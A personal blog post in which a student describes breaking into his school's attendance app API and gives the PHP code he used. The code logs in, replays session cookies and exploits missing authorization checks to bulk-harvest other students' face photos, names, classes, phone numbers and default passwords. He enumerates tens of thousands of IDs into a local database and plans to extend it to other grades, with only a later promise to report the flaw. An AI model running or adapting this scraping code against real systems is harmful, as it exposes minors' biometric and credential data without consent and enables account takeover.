Use PHP to scrape school attendance system data

For convenience, and to avoid disclosing identifying information, the attendance system is referred to as "Little Bee" below, and its domain name is written as bee.com.
Disclaimer: Everything described in this article was tested in good faith, and the vulnerabilities will be reported to the vendor once testing is complete. Please do not use any of it for illegal purposes!

0. Origin

A month ago, the school handed each class a batch of generated parent accounts for the attendance system, but the parents in our class never used them. One day, a classmate told me that she had logged in with her parent account, found that my record was bound to it, and could even view the photos of my face.

1. Try to capture packets

I logged in to the Little Bee app with my own account. By capturing the app's traffic with HttpCanary, I obtained the API endpoints and request formats for logging in, fetching photos, and so on.

2. Request interface

2.1. Login

code
https://bee.com/sctserver/mob/login?loginname=f11111111111&password=31df73b65ffc25317e1eb8966fe541cc

As you can see, the data structure of the login part is as follows:

json
{
    "loginname":"f11111111111",
    "password":"31df..."
}

I computed the MD5 hash of my plaintext password and found that it matched the value in the request exactly. So the password is clearly sent as a plain MD5 hash (strictly speaking, MD5 is a hash function, not encryption).
Here is the login code I ended up using:

PHP
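# The login name is "f" followed by $username; the password is sent as its MD5 hash
$url = "https://bee.com/sctserver/mob/login?loginname=f" . urlencode($username) . "&password=" . md5($password);
# After this call, PHP fills $http_response_header with the response headers
$response = file_get_contents($url);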
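
The query string can also be assembled with http_build_query(), which URL-encodes each value. This is only a sketch: the helper name buildLoginUrl and the example credentials are made up for illustration, and the endpoint is the anonymized one used above.

```php
<?php
// Hypothetical helper (not part of the original script): builds the login URL.
function buildLoginUrl(string $username, string $password): string
{
    $query = http_build_query(array(
        'loginname' => 'f' . $username, // the login name carries an "f" prefix
        'password'  => md5($password),  // the app sends the MD5 hash, not the plaintext
    ));
    return 'https://bee.com/sctserver/mob/login?' . $query;
}

// Example with made-up credentials
echo buildLoginUrl('11111111111', 'example-password'), "\n";
```

Keeping the URL construction in one function makes it easier to see exactly what is sent to the server.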

2.2. Get Cookies

I found that PHP's file_get_contents function does not store cookies or send them back automatically, so I had to extract them and attach them to later requests by hand.
After some search-engine-driven programming, I ended up with the following code, which collects the cookies into an array:

PHP
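$cookies = array();
# $http_response_header is filled in by the preceding file_get_contents() call
foreach ($http_response_header as $hdr)
{
    # Capture the "name=value" part of each Set-Cookie header (header names are case-insensitive)
    if (preg_match('/^Set-Cookie:\s*([^;]+)/i', $hdr, $matches))
    {
        # parse_str() turns "name=value" into array('name' => 'value')
        parse_str($matches[1], $tmp);
        $cookies += $tmp;
    }
}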
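
For illustration, the same extraction can be tried on a hand-written header list. The sketch below is an assumption-laden variant, not the code used in the original script: the helper name parseSetCookieHeaders and the sample headers are invented, and it captures the name and value directly with the regular expression instead of going through parse_str(), so the value is kept exactly as the server sent it.

```php
<?php
// Hypothetical helper: extracts cookie name/value pairs from raw response headers.
function parseSetCookieHeaders(array $headers): array
{
    $cookies = array();
    foreach ($headers as $header) {
        // Header names are case-insensitive; capture "name" and "value" up to the first ";"
        if (preg_match('/^Set-Cookie:\s*([^=;]+)=([^;]*)/i', $header, $m)) {
            // A later cookie with the same name overwrites the earlier one
            $cookies[trim($m[1])] = trim($m[2]);
        }
    }
    return $cookies;
}

// Made-up headers in the same shape as $http_response_header
$sample = array(
    'HTTP/1.1 200 OK',
    'Set-Cookie: acw_tc=abc123; path=/; HttpOnly',
    'Set-Cookie: JSESSIONID=DEF456; Path=/sctserver',
);
print_r(parseSetCookieHeaders($sample));
```

Attributes such as path and HttpOnly are dropped on purpose, since only the name and value are needed when sending the cookie back.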

I really did not expect to need a regular expression here, lol.
The resulting cookie array looks like this:

json
{
    "acw_tc":"784e...",
    "JSESSIONID":"E2692..."
}

2.3. Submit Cookies

To send the cookies along with later requests, I used the following code:

PHP
$opts = array(
    'http' => array(
        # Send both cookies in a single Cookie header, separated by "; "
        'header' => "Cookie: acw_tc=" . $cookies['acw_tc'] . "; JSESSIONID=" . $cookies['JSESSIONID'] . "\r\n",
        # Return the response body even when the status code is 4xx/5xx
        'ignore_errors' => true
    )
);
$data = file_get_contents("https://bee.com/sctserver/mob/attend/child/in-out?studentId=" . $uid, false, stream_context_create($opts));
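
HTTP clients normally send all of their cookies in one Cookie header, with the pairs separated by "; ". As a rough sketch, a small helper can build that header from a cookie array of any size. The name buildCookieHeader and the sample values are assumptions made for this example.

```php
<?php
// Hypothetical helper: joins a cookie array into one "Cookie" request header line.
function buildCookieHeader(array $cookies): string
{
    $pairs = array();
    foreach ($cookies as $name => $value) {
        $pairs[] = $name . '=' . $value;
    }
    return 'Cookie: ' . implode('; ', $pairs) . "\r\n";
}

// Made-up values standing in for the cookie array collected earlier
$cookies = array('acw_tc' => 'abc123', 'JSESSIONID' => 'DEF456');
$opts = array(
    'http' => array(
        'header'        => buildCookieHeader($cookies),
        'ignore_errors' => true,
    ),
);
// The context can then be passed as the third argument of file_get_contents()
$context = stream_context_create($opts);
echo buildCookieHeader($cookies);
```

Building the header from the whole array means no change is needed if the server starts issuing an additional cookie.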

2.4. Get photos

The login response contains a StudentId field. This value is very important, because it is required when requesting any other data.
Address of the attendance record interface:

code
https://bee.com/sctserver/mob/attend/child/in-out?studentId=1111111

The imgUrl field in the returned data is the photo URL. However, the photo obtained this way is blurry and noticeably less sharp than the one shown in the app.
For example:

code
https://server.bee.com/wmdp/comup/attenddir/20xx0x/0x/bre/FACE_DETECT_...-..._20xx0x0x0xxxxx.jpg

Evidently, photos are stored under the pattern: domain name / fixed directory / date / bre / student code + date + exact time.
I tried removing the /bre/ segment from the URL and got the HD version of the photo.
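
The URL rewrite described above is a plain string replacement. A minimal sketch follows; the function name toFullSizeUrl and the example URL are invented for illustration.

```php
<?php
// Hypothetical helper: drops the "/bre/" path segment from a photo URL.
function toFullSizeUrl(string $url): string
{
    return str_replace('/bre/', '/', $url);
}

// Made-up URL in the same shape as the example above
echo toFullSizeUrl('https://server.example.com/attenddir/202201/05/bre/FACE_DETECT_demo.jpg'), "\n";
```

A URL that does not contain the segment is returned unchanged.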

2.5. Cache

Worried that Little Bee might only keep photos for a month, I built a local cache.
Read data:

PHP
# Get the list of cached URLs
$url_list = json_decode(file_get_contents("./data/url.json"), true);
# Get the list of invalid student IDs
$null_list = json_decode(file_get_contents("./data/null.json"));

Check for caching:

PHP
# Get cache
# Check whether the cache directories already exist
if (!file_exists("./cache/image/" . $year . "/.cache"))
{
    for ($i = 1; $i <= 12; $i++)
    {
        # date('t') gives the number of days in month $i of $year
        for ($j = 1; $j <= date('t', mktime(0, 0, 0, $i, 1, $year)); $j++)
        {
            # Pad the month and day with leading zeros
            $f_month = str_pad($i, 2, "0", STR_PAD_LEFT);
            $f_day = str_pad($j, 2, "0", STR_PAD_LEFT);
            # Create the folder
            mkdir("./cache/image/" . $year . "/" . $f_month . "/" . $f_day, 0777, true);
        }
    }
    # Mark as created
    file_put_contents("./cache/image/" . $year . "/.cache", "yes");
}
# Check whether the image has been cached
if (file_exists($cache_path) && !empty($url_list[$date][$uid]))
{
    # Use the local copy if requested, otherwise the stored original URL
    if ($local) $img_url = str_replace("./cache/image/", "https://cdn.me.com/img/bee.com/", $cache_path);
    else $img_url = $url_list[$date][$uid];
    if ($display) redirect($img_url);
    else retCode(200, 'Get success', $img_url);
}
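
An alternative to creating every day's folder up front is to create a folder only when a file for that date is first needed. The following is a sketch under assumptions, not the approach used in the original script: the helper name cacheDirFor, the "YYYY-MM-DD" date format, and the temporary demo directory are all invented for this example.

```php
<?php
// Hypothetical helper: returns (and creates if needed) the cache folder for one date.
function cacheDirFor(string $root, string $date): string
{
    // $date is expected as "YYYY-MM-DD"; missing parts become 0 and fail validation
    $parts = array_map('intval', array_pad(explode('-', $date, 3), 3, 0));
    list($year, $month, $day) = $parts;
    // checkdate() rejects impossible dates such as February 30
    if (!checkdate($month, $day, $year)) {
        throw new InvalidArgumentException("Invalid date: $date");
    }
    $dir = sprintf('%s/%04d/%02d/%02d', rtrim($root, '/'), $year, $month, $day);
    if (!is_dir($dir)) {
        mkdir($dir, 0777, true); // recursive: creates year/month/day in one call
    }
    return $dir;
}

// Example using a temporary directory instead of ./cache/image
$root = sys_get_temp_dir() . '/bee-cache-demo';
echo cacheDirFor($root, '2022-01-10'), "\n";
```

With this approach no marker file is needed, and leap years are handled by checkdate() rather than by a day-count loop.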

The helper functions used to return results:

PHP
# Wrapper functions
# Return JSON
function retCode($code, $msg, $retdata)
{
    if ($code == 404) header('HTTP/1.1 404 Not Found');
    elseif ($code == 500) header('HTTP/1.1 500 Internal Server Error');
    elseif ($code == 403) header('HTTP/1.1 403 Forbidden');
    die(json_encode(array('code' => $code, 'msg' => $msg, 'data' => $retdata), JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES));
}
# Redirect
function redirect($url)
{
    header("Location: " . $url);
    # Stop here so that nothing else runs after the redirect header
    exit;
}

With this in place, the photos are stored permanently.
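
The status handling in retCode can also be written with PHP's built-in http_response_code() instead of hand-written status lines. The variant below is only a sketch: the name jsonResponse is hypothetical, and it returns the JSON string rather than calling die(), which is a design change made here so that the function is easier to test.

```php
<?php
// Hypothetical variant of retCode(): returns the JSON body instead of calling die().
function jsonResponse(int $code, string $msg, $data): string
{
    // Only pass the status codes used by retCode() through; anything else falls back to 200
    $status = in_array($code, array(200, 403, 404, 500), true) ? $code : 200;
    if (!headers_sent()) {
        http_response_code($status);
        header('Content-Type: application/json; charset=utf-8');
    }
    return json_encode(
        array('code' => $code, 'msg' => $msg, 'data' => $data),
        JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES
    );
}

echo jsonResponse(200, 'Get success', 'https://cdn.example.com/img/demo.jpg'), "\n";
```

The caller decides whether to echo the result and exit, so the same function works in a web request and in a command-line test.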

2.6. Get account information

Testing showed that most of the interfaces do not check whether the caller is allowed to see the requested data. For example, any logged-in account can retrieve the attendance records of any other account, and even its complete account information.

I have to complain here: Little Bee's response data is terribly bloated. The school details (country, province, city, zip code) and other fields are repeated two or three times in a single response, which makes it painful to work with. What should be a small payload balloons to 200 KB; no wonder the app is so sluggish.

The interface for obtaining account information:

code
https://bee.com/sctserver/mob/getinfo?id=1111111

The returned data contains the class, name, student ID, and even the complete password. My guess is that this is the default password, because for some users who have changed their password the field contains ****** instead.
So the data can be fetched and processed in batches with simple code.

PHP
# Send the request for student information
$data = json_decode(file_get_contents("https://bee.com/sctserver/mob/getinfo?id=" . $id, false, stream_context_create($opts)), true);
# Class information of the first student (empty array if the field is missing)
$data_list = $data['data']['familys'][0]['students'][0]['classno'] ?? array();
# Check whether the session is logged in and whether the user exists
if (($data['message'] ?? '') == "User is not logged in")
{
    return "nologin";
}
else if (empty($data['result']) || empty($data_list['className']) || empty($data_list['grade']))
{
    return "null";
}
else
{
    return array(
        $data['data']['phoneNumber'],
        $data['data']['familys'][0]['passwordshowStr'],
        $data_list['className'],
        $data_list['grade'],
        $data['data']['name']
    );
}

Store data:

PHP
# Extract the class number (one or two digits) from the class name
preg_match("/[0-9]{1,2}/", $info[2], $matches);
$class = $matches[0];
# Map the grade name to a number
if ($info[3] == "First grade") $grade = 1;
else if ($info[3] == "Second grade") $grade = 2;
else if ($info[3] == "Third grade") $grade = 3;
$name = $info[4];
# When the class changes, continue numbering from the students already stored for it
if ($currentClass != $class)
{
    $currentClass = $class;
    if (isset($student_list[$grade][$class]) && is_array($student_list[$grade][$class])) $currentNum = count($student_list[$grade][$class]) + 1;
    else $currentNum = 1;
}
else $currentNum++;
$student_list[$grade][$class][$currentNum] = array(
    'uid' => (int)$i,
    'name' => (string)$name,
    'num' => (int)$currentNum
);
file_put_contents("./data/student.json", json_encode($student_list, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT));

Having found an interface that returns user information, I started building a database of the students at my school. In the Little Bee system, names and classes do not map to StudentId values in any predictable order, so I could not simply derive one student's ID by incrementing from another. Instead, I requested the data tens of thousands of times and stored the results in a JSON file.
This took me two hours, because whenever the PHP script ran for more than a few dozen seconds the browser reported a 504 Gateway Timeout, and changing the configuration did not help.
In the end, I was able to freely retrieve the data of the first-year high school students. I will get to the second- and third-year students, and even those who have already graduated, when I have time.
Having read online about a junior high school student who did something similar and ended up with the police at his door, I decided to notify the Little Bee vendor after a period of research and to delete all the data I had saved. If I can find a few more vulnerabilities along the way and earn a CNVD certificate, even better.
January 10, 2022 Journal.

https://blog.tsinbei.com/en/archives/5/

Author: Hsukqi Lee
Posted on: 2022-01-10
Edited on: 2022-07-28
Licensed under: CC BY-NC-ND 4.0
